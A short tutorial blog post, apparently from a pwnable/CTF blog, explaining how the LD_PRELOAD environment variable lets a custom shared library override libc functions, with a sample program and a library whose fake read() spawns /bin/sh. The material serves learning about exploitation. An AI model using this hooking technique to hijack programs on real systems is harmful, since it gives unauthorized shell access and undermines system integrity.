What is Environment Variables?
Environment Variables are set of values that can affect process or binary.
You can check environment variables with "env" command in Linux.
What is LD_PRELOAD?
LD_PRELOAD is one of environment variables that indicates shared library of executable binary in Linux. Executable binary refers LD_PRELOAD environment variables to load functions in libraries like read, write, printf, etc... If hacker can hook this LD_PRELOAD, exploit is possible.
Hooking LD_PRELOAD
Hooking LD_PRELOAD can chagne flow of the program, and this results in EXPLOIT !
Below source shows [env.c] code.
// gcc -o env env.c
#include <unistd.h>
#include <stdio.h>
int main()
{
char buf[20];
write(1, "name : ", 7);
read(0, buf, sizeof(buf)-1);
write(1, "Hi\n", 3);
return 0;
}This is simple read/write fuction example.
And let's make library file called libc in Linux, and it usually has .so file extensions.
Below source shows [libc.c] code.
// gcc -o libc.so libc.c -fPIC -shared
#include <stdlib.h>
void read() {
execve("/bin/sh", 0, 0);
}I made read() function, and this executes [execve("/bin/sh", 0, 0)] which gives me shell !
After compile with gcc, let's hook !
Libc I made is located in /root/bin.
I can make LD_PRELOAD with "export" command like this.
Using "echo" command can see and check environment variables.
From now on, all binaries that I run refer [/root/bin/libc.so] instead of [/lib/x86_64-linux-gnu/libc.so.6] which is real libc !
When I run "./env", I can get shell !!
Because read() function in [/root/bin/libc.so] executes [execve("/bin/sh", 0, 0)] which runs shell.
'pwnable' 카테고리의 다른 글
| Valgrind (0) | 2022.01.27 |
|---|---|
| AFL++ (0) | 2022.01.27 |
| PIE base 구하기 (pwntools) (0) | 2018.09.02 |
| 쉘코드 만들기 (tool) (0) | 2018.08.25 |
| peda에서 heap 명령어 (0) | 2018.08.24 |